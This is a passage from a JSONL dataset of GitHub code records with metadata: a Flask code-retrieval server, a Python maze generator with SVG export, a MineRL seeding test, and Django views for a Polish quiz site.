150, "usage_type": "call"}, {"api_name": "panaxea.core.Model.Model", "line_number": 151, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 167, "usage_type": "call"}, {"api_name": "time.time", "line_number": 168, "usage_type": "call"}, {"api_name": "time.time", "line_number": 171, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 189, "usage_type": "call"}, {"api_name": "time.time", "line_number": 190, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 221, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 224, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 235, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 238, "usage_type": "call"}]}
+{"seq_id": "9211715294", "text": "from flask import Flask,request,jsonify,render_template\nfrom flask_cors import *\n\nfrom util import process_source, get_ast\nfrom CCGIR import Retrieval\n\nccgir = Retrieval()\n\nprint(\"Sentences to vectors\")\nccgir.encode_file()\n\nprint(\"Loading the index\")\nccgir.build_index(n_list=1)\nccgir.index.nprob = 1\n\napp = Flask(__name__)\napp.config['JSON_AS_ASCII'] = False\nCORS(app, supports_credentials=True)\n\nfrom flask.json import JSONEncoder as _JSONEncoder\n\nclass JSONEncoder(_JSONEncoder):\n    def default(self, o):\n        import decimal\n        if isinstance(o, decimal.Decimal):\n            return float(o)\n        super(JSONEncoder, self).default(o)\napp.json_encoder = JSONEncoder\n\n@app.route('/predict',methods=['GET'])\ndef predict():\n    origin_code = str(request.args['code'])\n    code = process_source(origin_code)\n    ast = get_ast(origin_code)\n    sim_code, sim_ast, sim_nl = ccgir.single_query(code, ast, topK=5)\n    result = {'nl':sim_nl}\n    return jsonify(result)\n\n@app.route('/index', 
@app.route('/index', methods=[\"GET\"])\ndef index():\n    return render_template('index.html')\n\nif __name__ == '__main__':\n    app.run()\n", "repo_name": "NTDXYG/CCGIR", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1101, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "52", "api": [{"api_name": "CCGIR.Retrieval", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.json.JSONEncoder", "line_number": 22, "usage_type": "name"}, {"api_name": "decimal.Decimal", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request.args", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "util.process_source", "line_number": 33, "usage_type": "call"}, {"api_name": "util.get_ast", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "12318086861", "text": "import os\nimport random\nimport colorama\nfrom colorama import Back\nfrom .cell import Cell\n\n\nWALL_PAIRS = {\n    \"N\": \"S\",\n    \"S\": \"N\",\n    \"E\": \"W\",\n    \"W\": \"E\"\n}\n\n\ndef remove_wall_for_adjacent_cells(cell_1: Cell, cell_2: Cell, wall: str) -> None:\n    # since one wall can be associated with 2 cells, we must remove it from both\n    cell_1.remove_wall(wall)\n    cell_2.remove_wall(WALL_PAIRS[wall])\n\n\nclass Maze():\n\n    def __init__(self, n: int, m: int, x_start=0, y_start=0) -> None:\n        self.rows_num = n\n        self.columns_num = m\n        self.x_start = x_start\n        self.y_start = y_start\n        # create an initial \"maze\" where all the cells are surrounded by walls\n        self.maze_map = [[Cell(x, y) for y in range(m)] for x in range(n)]\n\n    def get_cell(self, x: int, y: int) -> Cell:\n        return self.maze_map[x][y]\n\n    def get_unvisited_neighbours(self, cell: Cell) -> list[tuple[str, Cell]]:\n        \"\"\"\n        Checks all adjacent cells to see whether they were already visited: a cell\n        that still has all 4 walls has not yet been added to any path in the maze.
\n        Returns a list of (direction, cell) tuples for the adjacent unvisited cells.\n        \"\"\"\n        delta = [('W', (-1, 0)),\n                 ('E', (1, 0)),\n                 ('S', (0, 1)),\n                 ('N', (0, -1))]\n        neighbours = list()\n        for direction, (delta_x, delta_y) in delta:\n            x = cell.x + delta_x\n            y = cell.y + delta_y\n            if 0 <= x < self.rows_num and 0 <= y < self.columns_num:\n                neighbour = self.get_cell(x, y)\n                if neighbour.walled_aroud:\n                    neighbours.append((direction, neighbour))\n        return neighbours\n\n    def generate_maze(self) -> None:\n        \"\"\" Maze generator \"\"\"\n        total_cells_num = self.rows_num * self.columns_num\n        # stack of cells which are going to be processed\n        stack = list()\n        current_cell = self.get_cell(self.x_start, self.y_start)\n        visited_num = 1\n        # while there are unvisited cells in the maze map\n        while visited_num < total_cells_num:\n            neighbours = self.get_unvisited_neighbours(current_cell)\n            # if there are no unvisited neighbours, then this cell has been processed\n            if not neighbours:\n                current_cell = stack.pop()\n                continue\n            # random selection of the next cell to process\n            direction, next_cell = random.choice(neighbours)\n            # remove walls for path\n            remove_wall_for_adjacent_cells(current_cell, next_cell, direction)\n            # add cell to stack for processing\n            stack.append(current_cell)\n            current_cell = next_cell\n            visited_num += 1\n\n    def show(self) -> None:\n        \"\"\" Print an eye-friendly maze \"\"\"\n        colorama.init(autoreset=True)\n        print(\"\".join([f\"{Back.RED} \" * (self.rows_num * 2 + 1)]))\n        for y in range(self.columns_num):\n            row = [f\"{Back.RED} \"]\n            for x in range(self.rows_num):\n                if self.maze_map[x][y].walls[\"E\"]:\n                    row.append(f\"{Back.GREEN} {Back.RED} \")\n                else:\n                    row.append(f\"{Back.GREEN} \")\n            print((\"\".join(row)))\n            row = [f\"{Back.RED} \"]\n            for x in range(self.rows_num):\n                if self.maze_map[x][y].walls[\"S\"]:\n                    row.append(f\"{Back.RED} \")\n                else:\n                    row.append(f\"{Back.GREEN} {Back.RED} \")\n            print((\"\".join(row)))\n\n    def write_svg(self):\n        \"\"\" Save the maze as an .svg image \"\"\"\n        # create dir for mazes\n        if not os.path.exists(\"Mazes\"):\n            os.mkdir(\"Mazes\")\n        # if there is a maze of the same size, remove it\n        filepath = f\"Mazes/{self.rows_num}x{self.columns_num}.svg\"\n        if os.path.exists(filepath):\n            os.remove(filepath)\n\n        aspect_ratio = self.rows_num / self.columns_num\n        # padding around maze\n        padding = 10\n        # height and width of the maze image in pixels (without padding)\n        height = 500\n        width = int(height * aspect_ratio)\n        # scaling factors mapping maze coordinates to image coordinates\n        scy, scx = height / self.columns_num, width / self.rows_num\n\n        def write_wall(ww_f, ww_x1, ww_y1, ww_x2, ww_y2):\n            \"\"\"Write a single wall to the SVG image file handle f.\"\"\"\n            print(\n                f'<line x1=\"{ww_x1}\" y1=\"{ww_y1}\" x2=\"{ww_x2}\" y2=\"{ww_y2}\"/>', file=ww_f)\n\n        # write the .svg image file for maze\n        with open(filepath, 'w') as f:\n            print('<?xml version=\"1.0\" encoding=\"utf-8\"?>', file=f)\n            print('<svg xmlns=\"http://www.w3.org/2000/svg\"', file=f)\n            print(' xmlns:xlink=\"http://www.w3.org/1999/xlink\"', file=f)\n            print(f' width=\"{width + 2 * padding}\" height=\"{height + 2 * padding}\" viewBox=\"{-padding} {-padding} {width + 2 * padding} {height + 2 * padding}\">', file=f)\n            print('<defs>\\n<style type=\"text/css\"><![CDATA[', file=f)\n            print('line {', file=f)\n            print(' stroke: #000000;\\n stroke-linecap: square;', file=f)\n            print(' stroke-width: 5;\\n}', file=f)\n            print(']]></style>\\n</defs>', file=f)\n            # draw the \"South\" and \"East\" walls of each cell, if present (these\n            # are the
\"North\" and \"West\" walls of a neighbouring cell in\n # general, of course).\n for x in range(self.rows_num):\n for y in range(self.columns_num):\n if self.get_cell(x, y).walls['S']:\n x1, y1, x2, y2 = x * \\\n scx, (y + 1) * scy, (x + 1) * scx, (y + 1) * scy\n write_wall(f, x1, y1, x2, y2)\n if self.get_cell(x, y).walls['E']:\n x1, y1, x2, y2 = (x + 1) * scx, y * \\\n scy, (x + 1) * scx, (y + 1) * scy\n write_wall(f, x1, y1, x2, y2)\n # draw the North and West maze border, which won't have been drawn\n # by the procedure above.\n print(f'<line x1=\"0\" y1=\"0\" x2=\"{width}\" y2=\"0\"/>', file=f)\n print(f'<line x1=\"0\" y1=\"0\" x2=\"0\" y2=\"{height}\"/>', file=f)\n print('</svg>', file=f)\n\n def get_maze_as_boolean_matrix(self) -> list[list[bool]]:\n matrix= [[1] * (self.rows_num * 2 + 1)]\n \n for y in range(self.columns_num):\n row = [1]\n for x in range(self.rows_num):\n if self.maze_map[x][y].walls[\"E\"]:\n row.append(0)\n row.append(1)\n else:\n row.append(0)\n row.append(0)\n matrix.append(row)\n row = [1]\n for x in range(self.rows_num):\n if self.maze_map[x][y].walls[\"S\"]:\n row.append(1)\n row.append(1)\n else:\n row.append(0)\n row.append(1)\n matrix.append(row)\n \n return matrix\n", "repo_name": "antonKorobenko/maze-generator", "sub_path": "maze_generator/maze.py", "file_name": "maze.py", "file_ext": "py", "file_size_in_byte": 7117, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cell.Cell", "line_number": 16, "usage_type": "name"}, {"api_name": "cell.Cell", "line_number": 30, "usage_type": "call"}, {"api_name": "cell.Cell", "line_number": 32, "usage_type": "name"}, {"api_name": "cell.Cell", "line_number": 35, "usage_type": "name"}, {"api_name": "cell.x", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cell.y", "line_number": 48, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 70, "usage_type": "call"}, {"api_name": "colorama.init", "line_number": 80, "usage_type": "call"}, {"api_name": "colorama.Back.RED", "line_number": 81, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 81, "usage_type": "name"}, {"api_name": "colorama.Back.RED", "line_number": 83, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 83, "usage_type": "name"}, {"api_name": "colorama.Back.GREEN", "line_number": 86, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 86, "usage_type": "name"}, {"api_name": "colorama.Back.RED", "line_number": 86, "usage_type": "attribute"}, {"api_name": "colorama.Back.GREEN", "line_number": 88, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 88, "usage_type": "name"}, {"api_name": "colorama.Back.RED", "line_number": 90, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 90, "usage_type": "name"}, {"api_name": "colorama.Back.RED", "line_number": 93, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 93, "usage_type": "name"}, {"api_name": "colorama.Back.GREEN", "line_number": 95, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 95, "usage_type": "name"}, {"api_name": "colorama.Back.RED", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 
105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "8084258293", "text": "\"\"\"To launch this test do the following.\n\n1. Launch Pyro4-ns\n\n pyro4-ns\n\n2. Launch the instance manager\n\npython3 -c \"from ai_crowd_specified_seed_test import lim; lim()\" --seeding_type=3 --seeds 1,1,1;2,2,2\n\n3. Run the test.\n\npython3 -m ai_crowd_specified_seed_test\n\"\"\"\n\nimport os\nimport subprocess\nimport io\n\nimport time\nimport threading\nimport Pyro4\n\n\ndef launch_ns():\n \"\"\"Launches the pyro4-ns if it doesn't already exist.\n\n Returns the process.\n \"\"\"\n return subprocess.Popen([\"pyro4-ns\"], shell=False)\n\n\ndef launch_im():\n return subprocess.Popen(\n 'python3 scripts/launch_instance_manager.py --seeding_type=3 --seeds=1,1,1,1;2,2,2,2'.split(' '), shell=False)\n\n\ndef main():\n \"\"\"Tests multi-instance seeding.\n \"\"\"\n # try:\n # # 1. Launch the pyro4-ns if it doesn't exist\n # ns =launch_ns()\n # print(\"launched!\")\n # time.sleep(1)\n # im = launch_im()\n # time.sleep(2)\n\n # envs = []\n\n import gym\n os.environ['MINERL_INSTANCE_MANAGER_REMOTE'] = '1'\n import minerl\n\n def run_env():\n try:\n env = gym.make('MineRLNavigateDense-v0')\n except Exception as e:\n print(\"Pyro traceback:\")\n print(\"\".join(Pyro4.util.getPyroTraceback()))\n raise e\n\n for _ in range(3):\n env.reset()\n for _ in range(100):\n env.step(env.action_space.no_op())\n # env.render()\n\n thrs = [threading.Thread(target=run_env) for _ in range(2)]\n for t in thrs:\n time.sleep(1)\n t.start()\n\n for t in thrs:\n t.join()\n\n # finally:\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "minerllabs/minerl", "sub_path": "tests/excluded/ai_crowd_specified_seed_test.py", "file_name": "ai_crowd_specified_seed_test.py", "file_ext": "py", "file_size_in_byte": 1665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 587, "dataset": "github-code", "pt": "52", "api": [{"api_name": "subprocess.Popen", "line_number": 30, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 34, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "gym.make", "line_number": 57, "usage_type": "call"}, {"api_name": "Pyro4.util.getPyroTraceback", "line_number": 60, "usage_type": "call"}, {"api_name": "Pyro4.util", "line_number": 60, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 69, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "18664388660", "text": "# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render, redirect\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth import forms, logout # authenticate, login\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom pytania.models import Grupa, Kategoria, Obrazek, Pytanie\nfrom django.contrib.auth.models import Group\nfrom pytania.forms import UserChangePassEmailForm\nfrom pytania.forms import GroupForm, GrupaForm\nfrom django.http import HttpResponseRedirect\nfrom pytania.forms import PytanieForm, OdpowiedziFormSet\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.views.generic.list import ListView\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\n\n\ndef 
index(request):\n    \"\"\"Home page\"\"\"\n    formlog = forms.AuthenticationForm()\n    context = {'user': request.user, 'formlog': formlog}\n    return render(request, 'pytania/index.html', context)\n\n\n@login_required()\ndef change_password(request):\n    if request.method == 'POST':\n        form = UserChangePassEmailForm(request.user, request.POST)\n        if form.is_valid():\n            user = form.save()\n            update_session_auth_hash(request, user) # Important!\n            messages.success(request, \"Dane zaktualizowano!\")\n            return redirect('/')\n        else:\n            messages.error(request, 'Proszę popraw błędy!')\n    else:\n        form = UserChangePassEmailForm(request.user)\n    return render(request, 'password_change_form.html', {\n        'form': form\n    })\n\n\n@login_required()\ndef my_profil(request):\n    \"\"\"Editing the user's data\"\"\"\n\n    from pytania.forms import UserUpdateForm\n    from pytania.forms import UserGroupForm\n    user_form = UserUpdateForm(instance=request.user)\n    if request.method == 'POST':\n        user_form = UserUpdateForm(data=request.POST, instance=request.user)\n        if user_form.has_changed() and user_form.is_valid():\n            user_form.save()\n            messages.success(request, \"Dane zaktualizowano!\")\n        else:\n            messages.info(request, \"Dane są aktualne.\")\n\n    # formlog = forms.AuthenticationForm()\n    grupa_form = UserGroupForm()\n    grupy = request.user.groups.all()\n    context = {\n        'user_form': user_form,\n        'grupa_form': grupa_form,\n        'grupy': grupy\n    }\n    return render(request, 'pytania/profil.html', context)\n\n\ndef my_logout(request):\n    \"\"\"Logging the user out of the system\"\"\"\n    logout(request)\n    messages.info(request, \"Zostałeś wylogowany!\")\n    return redirect(reverse('pytania:index'))\n\n\n@login_required()\ndef my_grupy(request):\n    \"\"\"Adding the user to a group / listing groups / removing the user from a group\"\"\"\n\n    from pytania.forms import UserUpdateForm\n    from pytania.forms import UserGroupForm\n\n    if request.method == 'POST':\n        grupa_form = UserGroupForm(data=request.POST)\n        if grupa_form.is_valid():\n            try:\n                grupa = Grupa.objects.get(\n                    token=grupa_form.cleaned_data.get('token'))\n                if request.user.groups.filter(pk=grupa.grupa.id).count():\n                    messages.warning(\n                        request, 'Jesteś już w grupie %s!' % grupa.grupa)
\n                else:\n                    grupa.grupa.user_set.add(request.user)\n                    messages.success(\n                        request, \"Dodano Cię do grupy %s!\" % grupa.grupa)\n            except Grupa.DoesNotExist:\n                messages.error(request, 'Błędne hasło!')\n\n    # removing the user from the selected groups\n    if request.POST.get('grupydel'):\n        for g_id in request.POST.get('grupydel'):\n            grupa = Grupa.objects.get(grupa=g_id)\n            grupa.grupa.user_set.remove(request.user)\n            messages.success(\n                request, \"Usunięto Cię z grupy %s!\" % grupa.grupa)\n\n    user_form = UserUpdateForm(instance=request.user)\n    grupa_form = UserGroupForm()\n    grupy = request.user.groups.all()\n    context = {\n        'user_form': user_form,\n        'grupa_form': grupa_form,\n        'grupy': grupy\n    }\n    return render(request, 'pytania/profil.html', context)\n\n\n# def test_func(user):\n#     \"\"\"Is the user in the Autorzy group?\"\"\"\n#     return user.groups.filter(name='Autorzy').exists()\n\n\n@login_required\n# @user_passes_test(test_func)\n# @transaction.atomic\ndef update_grupa(request, group_id=None):\n\n    if not request.user.groups.filter(name='Autorzy').exists():\n        messages.warning(\n            request,\n            \"Aby dodawać grupy, musisz należeć do grupy Autorzy\")\n        return redirect('/grupy/')\n\n    object_list = Grupa.objects.filter(autor=request.user)\n\n    if (group_id):\n        group = Group.objects.select_related('grupa').get(pk=group_id)\n    else:\n        group = Group()\n        group.grupa = Grupa()\n\n    if request.method == 'POST':\n        group_form = GroupForm(request.POST, instance=group)\n        grupa_form = GrupaForm(request.POST, instance=group.grupa)\n        grupa_form.instance.autor = request.user\n        if group_form.is_valid() and grupa_form.is_valid():\n            group_form.instance.autor = request.user\n            group_form.instance.token = grupa_form.instance.token\n            group_form.save()\n            # grupa_form.instance.grupa = obj\n            # grupa_form.save()\n            messages.success(request, ('Dodano grupę'))\n            return redirect('pytania:grupa')\n        else:\n            messages.error(request, ('Popraw poniższe błędy.'))\n    else:\n        group_form = GroupForm(instance=group)\n        grupa_form = GrupaForm(instance=group.grupa)\n\n    return render(request, 'pytania/grupa_form.html', {\n        'object_list': object_list,\n        'group_form': group_form,\n        'grupa_form': grupa_form\n    })\n\n\nclass GrupaDelete(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n    model = Group\n    template_name_suffix = '_delete'\n    success_url = '/grupa'\n\n    def test_func(self):\n        \"\"\"Override of the function testing the user's permissions\"\"\"\n        return self.request.user.groups.filter(name='Autorzy').exists()\n\n    def get_login_url(self):\n        if not self.request.user.is_authenticated():\n            return super(GrupaDelete, self).get_login_url()\n        else:\n            self.redirect_field_name = None\n            messages.warning(\n                self.request,\n                \"Aby usuwać grupy, musisz należeć do grupy Autorzy\")\n            return '/grupy/'\n\n\nclass KategoriaCreate(LoginRequiredMixin, CreateView):\n    # login_url = '/pytania/login/'\n    model = Kategoria\n    fields = ['nazwa']\n    success_url = '/kategoria'\n\n    def get_context_data(self, **kwargs):\n        kwargs['object_list'] = Kategoria.objects.filter(\n            autor=self.request.user)\n        return super(KategoriaCreate, self).get_context_data(**kwargs)\n\n    def form_valid(self, form):\n        kategoria = form.save(commit=False)\n        kategoria.autor = self.request.user\n        kategoria.save()\n        return super(KategoriaCreate, self).form_valid(form)\n\n\nclass KategoriaUpdate(LoginRequiredMixin, UpdateView):\n    # login_url = '/pytania/login/'\n    model = Kategoria\n    fields = ['nazwa']\n    success_url = '/kategoria'\n\n    def get_context_data(self, **kwargs):\n        kwargs['object_list'] =
Kategoria.objects.filter(\n autor=self.request.user)\n return super(KategoriaUpdate, self).get_context_data(**kwargs)\n\n # def form_valid(self, form):\n # kategoria = form.save(commit=False)\n # kategoria.autor = self.request.user\n # kategoria.save()\n # return super(KategoriaUpdate, self).form_valid(form)\n\n\nclass KategoriaDelete(LoginRequiredMixin, DeleteView):\n model = Kategoria\n template_name_suffix = '_delete'\n success_url = '/kategoria'\n\n def form_valid(self, form):\n print(form.cleaned_data)\n return super(KategoriaDelete, self).form_valid(form)\n\n\ndef kategoriaDel(request):\n from django.http import JsonResponse\n data = {}\n if request.method == 'POST':\n kategoria_id = request.POST.get('kategoria-id')\n if kategoria_id:\n data['success'] = 'Kategorię usunięto!'\n else:\n data['error'] = 'To nie powinno się zdarzyć!'\n\n return JsonResponse(data)\n\n\nclass ObrazekCreate(LoginRequiredMixin, CreateView):\n model = Obrazek\n fields = ['obrazek', 'opis', 'kategoria']\n success_url = '/obrazek'\n\n def get_context_data(self, **kwargs):\n kwargs['object_list'] = Obrazek.objects.filter(\n autor=self.request.user)\n return super(ObrazekCreate, self).get_context_data(**kwargs)\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n obj.autor = self.request.user\n obj.save()\n return super(ObrazekCreate, self).form_valid(form)\n\n\nclass ObrazekUpdate(LoginRequiredMixin, UpdateView):\n model = Obrazek\n fields = ['obrazek', 'opis', 'kategoria']\n success_url = '/obrazki'\n\n\nclass ObrazekDelete(LoginRequiredMixin, DeleteView):\n model = Obrazek\n fields = ['obrazek', 'opis', 'kategoria']\n success_url = '/obrazki'\n\n\nclass PytanieCreate(LoginRequiredMixin, CreateView):\n # login_url = '/pytania/login/'\n model = Pytanie\n form_class = PytanieForm\n success_url = '/pytanie'\n\n def get(self, request, *args, **kargs):\n self.object = None\n form_class = self.get_form_class()\n form = self.get_form(form_class)\n odpowiedzi = OdpowiedziFormSet()\n print(odpowiedzi)\n return self.render_to_response(\n self.get_context_data(form=form, odpowiedzi=odpowiedzi))\n\n def post(self, request, *args, **kwargs):\n self.object = None\n form_class = self.get_form_class()\n form = self.get_form(form_class)\n odpowiedzi = OdpowiedziFormSet(self.request.POST)\n if form.is_valid() and odpowiedzi.is_valid():\n return self.form_valid(form, odpowiedzi)\n else:\n return self.form_invalid(form, odpowiedzi)\n\n def form_valid(self, form, odpowiedzi):\n pytanie = form.save(commit=False)\n pytanie.autor = self.request.user\n pytanie.save()\n self.object = pytanie\n odpowiedzi.instance = self.object\n odpowiedzi.save()\n return HttpResponseRedirect(self.get_success_url())\n\n def form_invalid(self, form, odpowiedzi):\n return self.render_to_response(\n self.get_context_data(form=form, odpowiedzi=odpowiedzi)\n )\n\n\nclass PytaniaLista(LoginRequiredMixin, ListView):\n\n model = Pytanie\n\n def get_context_data(self, **kwargs):\n context = super(PytaniaLista, self).get_context_data(**kwargs)\n context['object_list'] = Pytanie.objects.filter(\n autor=self.request.user)\n return context\n\n\n@login_required(login_url='/login')\ndef pytania(request):\n from pytania.forms import PytanieForm, OdpowiedziFormSet\n\n form = PytanieForm()\n odpowiedzi_formset = OdpowiedziFormSet(instance=Pytanie())\n\n formlog = forms.AuthenticationForm()\n context = {'form': form,\n 'formlog': formlog,\n 'odpowiedzi': odpowiedzi_formset}\n return render(request, 'pytania/pytania.html', context)\n\n\n# from 
django.views.generic import ListView\n# class KategoriaListView(ListView):\n# context_object_name = \"kategorie\"\n# queryset = Kategoria.objects.filter(autor=request.user)\n# template_name = \"pytania/kategorie.html\"\n\n# def get_queryset(self):\n# return Kategoria.objects.filter(autor=self.request.user)\n", "repo_name": "xinulsw/testy3dj", "sub_path": "pytania/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 11648, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.auth.forms.AuthenticationForm", "line_number": 22, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms", "line_number": 22, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "pytania.forms.UserChangePassEmailForm", "line_number": 30, "usage_type": "call"}, {"api_name": "django.contrib.auth.update_session_auth_hash", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 34, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 34, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 35, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 37, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 37, "usage_type": "name"}, {"api_name": "pytania.forms.UserChangePassEmailForm", "line_number": 39, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 27, "usage_type": "call"}, {"api_name": "pytania.forms.UserUpdateForm", "line_number": 51, "usage_type": "call"}, {"api_name": "pytania.forms.UserUpdateForm", "line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 56, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 56, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 58, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 58, "usage_type": "name"}, {"api_name": "pytania.forms.UserGroupForm", "line_number": 61, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 68, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 73, "usage_type": "call"}, {"api_name": "django.contrib.messages.info", "line_number": 74, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 74, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 75, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 75, "usage_type": "call"}, {"api_name": "pytania.forms.UserGroupForm", "line_number": 86, "usage_type": "call"}, {"api_name": "pytania.models.Grupa.objects.get", "line_number": 89, "usage_type": "call"}, {"api_name": "pytania.models.Grupa.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pytania.models.Grupa", "line_number": 89, "usage_type": "name"}, {"api_name": "django.contrib.messages.warning", "line_number": 92, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 92, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 96, 
"usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 96, "usage_type": "name"}, {"api_name": "pytania.models.Grupa.DoesNotExist", "line_number": 98, "usage_type": "attribute"}, {"api_name": "pytania.models.Grupa", "line_number": 98, "usage_type": "name"}, {"api_name": "django.contrib.messages.error", "line_number": 99, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 99, "usage_type": "name"}, {"api_name": "pytania.models.Grupa.objects.get", "line_number": 104, "usage_type": "call"}, {"api_name": "pytania.models.Grupa.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pytania.models.Grupa", "line_number": 104, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 106, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 106, "usage_type": "name"}, {"api_name": "pytania.forms.UserUpdateForm", "line_number": 109, "usage_type": "call"}, {"api_name": "pytania.forms.UserGroupForm", "line_number": 110, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 117, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 78, "usage_type": "call"}, {"api_name": "django.contrib.messages.warning", "line_number": 131, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 131, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 134, "usage_type": "call"}, {"api_name": "pytania.models.Grupa.objects.filter", "line_number": 136, "usage_type": "call"}, {"api_name": "pytania.models.Grupa.objects", "line_number": 136, "usage_type": "attribute"}, {"api_name": "pytania.models.Grupa", "line_number": 136, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.select_related", "line_number": 139, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 139, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 141, "usage_type": "call"}, {"api_name": "pytania.models.Grupa", "line_number": 142, "usage_type": "call"}, {"api_name": "pytania.forms.GroupForm", "line_number": 145, "usage_type": "call"}, {"api_name": "pytania.forms.GrupaForm", "line_number": 146, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 154, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 154, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 155, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 157, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 157, "usage_type": "name"}, {"api_name": "pytania.forms.GroupForm", "line_number": 159, "usage_type": "call"}, {"api_name": "pytania.forms.GrupaForm", "line_number": 160, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 162, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 125, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 169, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.UserPassesTestMixin", "line_number": 169, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 169, "usage_type": "name"}, {"api_name": 
